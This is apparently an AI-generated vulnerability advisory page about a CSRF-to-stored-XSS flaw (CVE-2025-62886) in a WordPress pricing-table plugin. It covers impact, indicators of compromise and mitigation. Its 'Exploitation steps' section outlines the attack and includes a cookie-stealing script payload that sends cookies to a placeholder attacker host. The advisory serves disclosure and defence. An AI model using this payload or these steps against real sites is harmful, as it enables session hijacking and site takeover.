CVE-2025-62886
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-62886 is a Cross-Site Request Forgery (CSRF) vulnerability in the wpdevart Pricing Table builder WordPress plugin that enables Stored Cross-Site Scripting (XSS). It affects all versions of the plugin up to and including 1.5.3, with no official patch currently available. The vulnerability was reported by researcher Skalucy on May 30, 2025, and published by Patchstack on June 29, 2025. It carries a CVSS v3.1 base score of 7.1 (High) (Patchstack, Red Hat CVE).

Technical details

The root cause is classified as CWE-352 (Cross-Site Request Forgery), where the plugin fails to implement adequate CSRF token validation on sensitive administrative actions, allowing those actions to be triggered by forged requests (Patchstack). An unauthenticated attacker can craft a malicious web page or link that, when visited by an authenticated WordPress administrator, silently submits a forged request to the plugin's endpoints — resulting in the storage of attacker-controlled JavaScript (Stored XSS) within the site's database. The attack vector is network-based, requires no privileges, but does require user interaction (a privileged user clicking a malicious link or visiting a crafted page). No public proof-of-concept code has been identified at this time (Red Hat CVE).

Impact

Successful exploitation allows an attacker to inject and persistently store malicious scripts within the WordPress site, which are then executed in the browsers of any user who views the affected pricing table content. This can lead to session hijacking, credential theft, unauthorized administrative actions, defacement of website content, and potential full compromise of the WordPress installation. The changed scope in the CVSS vector indicates that the impact extends beyond the plugin itself to affect the broader WordPress environment and its users (Patchstack).

Exploitability

There is no evidence of public proof-of-concept exploit code or active in-the-wild exploitation at this time (Patchstack). The EPSS score is extremely low at 0.000080, reflecting a minimal probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that CSRF vulnerabilities of this type are sometimes leveraged in mass-exploit campaigns targeting WordPress plugins at scale, regardless of individual site traffic.

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the wpdevart Pricing Table builder plugin version ≤ 1.5.3 using tools like WPScan, Shodan, or Google dorks targeting plugin-specific file paths.
  2. Craft malicious payload: Create an HTML page containing a hidden form or auto-submitting JavaScript that targets the plugin's administrative endpoint (e.g., a settings save or table creation action) and embeds a malicious XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in a plugin input field.
  3. Deliver the forged request: Trick an authenticated WordPress administrator into visiting the attacker-controlled page via phishing email, social engineering, or a malicious link — causing the browser to automatically submit the forged CSRF request using the admin's active session cookies.
  4. Stored XSS execution: The malicious script is stored in the WordPress database via the plugin. Any user (admin or visitor) who subsequently views the affected pricing table will have the script execute in their browser, enabling session theft, credential harvesting, or further attacks (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing unexpected POST requests to plugin-related admin-ajax.php endpoints or plugin settings pages from unusual referrer origins or with no referrer header.
  • Database: Unexpected <script> tags or JavaScript payloads stored in WordPress database tables associated with the wpdevart Pricing Table builder plugin (e.g., wp_options or custom plugin tables).
  • Network: Outbound connections from site visitors' browsers to unknown external domains shortly after viewing pages containing pricing tables; unusual data exfiltration patterns in web server logs.
  • File System: Unexpected modifications to plugin configuration data or the presence of obfuscated JavaScript within plugin-managed content.

Mitigation and workarounds

As of the time of publication, no official patch is available for the wpdevart Pricing Table builder plugin — all versions up to and including 1.5.3 are considered vulnerable (Patchstack). Site administrators should consider deactivating and removing the plugin until a patched version is released by the developer. As interim mitigations, restrict access to the WordPress admin panel to trusted IP addresses, enforce strong session management, and deploy a Web Application Firewall (WAF) capable of detecting CSRF and XSS patterns. Patchstack's virtual patching feature can provide protection for subscribers while awaiting an official fix.

Community reactions

The vulnerability was discovered and disclosed by independent researcher Skalucy through Patchstack's vulnerability disclosure program, published on June 29, 2025 (Patchstack). Patchstack classifies the issue as low priority with unlikely exploitation impact, though it notes that CSRF vulnerabilities in WordPress plugins are commonly used in mass-exploit campaigns. No significant broader media coverage or notable researcher commentary beyond the initial Patchstack disclosure has been identified.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-18044NONEN/A
  • estatik
NoYesAug 12, 2026
CVE-2026-17008NONEN/A
  • quick-paypal-payments
NoNoAug 12, 2026
CVE-2026-16990NONEN/A
  • wp-paypal
NoNoAug 12, 2026
CVE-2026-16747NONEN/A
  • kirki
NoYesAug 12, 2026
CVE-2026-16621NONEN/A
  • woo-paypal-gateway
NoYesAug 12, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management